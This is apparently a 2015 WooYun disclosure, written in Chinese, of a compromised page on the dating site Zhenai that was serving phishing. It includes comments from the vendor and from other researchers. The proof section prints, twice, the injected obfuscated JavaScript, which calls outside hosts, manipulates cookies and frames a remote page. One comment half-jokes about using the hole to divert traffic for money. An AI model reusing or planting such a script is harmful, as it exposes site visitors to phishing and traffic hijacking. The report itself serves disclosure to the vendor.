珍爱网被shell已被用作钓鱼

漏洞概要

缺陷编号:WooYun-2015-097901

漏洞标题:珍爱网被shell已被用作钓鱼

相关厂商:珍爱网

漏洞作者:路人甲

提交时间:2015-02-21 15:01

公开时间:2015-04-13 16:58

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-21: 细节已通知厂商并且等待厂商处理中
2015-02-21: 厂商已经确认,细节仅向厂商公开
2015-03-03: 细节向核心白帽子及相关领域专家公开
2015-03-13: 细节向普通白帽子公开
2015-03-23: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

珍爱网被shell

详细说明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtmlhttp://m.zhenai.com/profile/qq/index.html?源代码<!DOCTYPEhtml><html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" /><meta name="renderer" content="webkit" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Expires" content="0" /><title></title></head><script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script><script type="text/javascript">var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="http://www.secevery.com:4321/bugs/wooyun-2015-097901/','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}</script><body></body></html>问题站点http://www.olfof.cn/shell没扫出来管理员自行排查

漏洞证明:

http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtmlhttp://m.zhenai.com/profile/qq/index.html?源代码<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta charset="utf-8" /><meta name="renderer" content="webkit" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-cache" /><meta http-equiv="Expires" content="0" /><title></title></head><script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js"></script><script type="text/javascript">var _$=["location","search","substr","http://www.leam.com.cn/g.php","document","cookie","indexOf","links=","parseInt","random","ajax","get","http://www.olfof.cn/json.php?k=","jsonp","callback","success_MyCallback","body","empty","links=","links","base=","reload","body","html","..",'links','base',"?b=","&l=","document","split","; ","length","=","unescape",'write','<fra','write','meset','write',' framespacing="0" border="0" rows="100%,*" frameborder="0">','write','<frame src="http://www.secevery.com:4321/bugs/wooyun-2015-097901/','"','write',' scrolling="yes">','write','</frame>','write','</fra','write','meset>','',"charCodeAt","toString","match",'=0;expires=',"toUTCString"];var a=window[_$[0]][_$[1]][_$[2]](1);var b=_$[3];if(window[_$[4]][_$[5]][_$[6]](_$[7])==-1){var g=window[_$[8]](Math[_$[9]]()*19+16);$[_$[10]]({type:_$[11],url:_$[12]+a,dataType:_$[13],jsonp:_$[14],jsonpCallback:_$[15],success:function(h){$(_$[16])[_$[17]]();window[_$[4]][_$[5]]=_$[7]+e(h[_$[19]],g);window[_$[4]][_$[5]]=_$[20]+g;location[_$[21]](false)},error:function(){$(_$[16])[_$[23]](_$[24])}})}else{var g=c(_$[25]);var h=c(_$[26]);f();var i=b+_$[27]+h+_$[28]+g;d(i,_$[4])};function c(g){var h=window[_$[4]][_$[5]][_$[30]](_$[31]);for(var i=0;i<h[_$[32]];i++){var j=h[i][_$[30]](_$[33]);if(j[0]==g)return window[_$[34]](j[1])}};function d(g,h){window[h][_$[35]](_$[36]);window[h][_$[35]](_$[38]);window[h][_$[35]](_$[40]);window[h][_$[35]](_$[42]+g+_$[43]);window[h][_$[35]](_$[45]);window[h][_$[35]](_$[47]);window[h][_$[35]](_$[49]);window[h][_$[35]](_$[51])};function e(g,h){var i=g[_$[32]];str=_$[52];for(var j=0;j<i;j++){str+=window[_$[8]](g[_$[53]](j))[_$[54]](h)};return str};function f(){var h=window[_$[4]][_$[5]][_$[55]](/[^ =;]+(?=\=)/g);if(h){for(var i=h[_$[32]];i--;){window[_$[4]][_$[5]]=h[i]+_$[56]+new Date(0)[_$[57]]()}}}</script><body></body></html>问题站点http://www.olfof.cn/shell没扫出来管理员自行排查

修复方案:

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-02-2116:39

厂商回复:

安全无小事,谢谢

最新状态:

暂无

评价

  1. 2010-01-01 00:00 子非海绵宝宝 白帽子 | Rank:1220 漏洞数:113)

    shell就3RANK?还无小事?

  2. 2010-01-01 00:00 浅蓝 白帽子 | Rank:131 漏洞数:20)

    @子非海绵宝宝 - -人家的意思是“安全的一点小细节都要被重视”,不过rank确实少了点

  3. 2010-01-01 00:00 大白菜 白帽子 | Rank:22 漏洞数:3)

    ./...还不如拿来引流还能赚个几K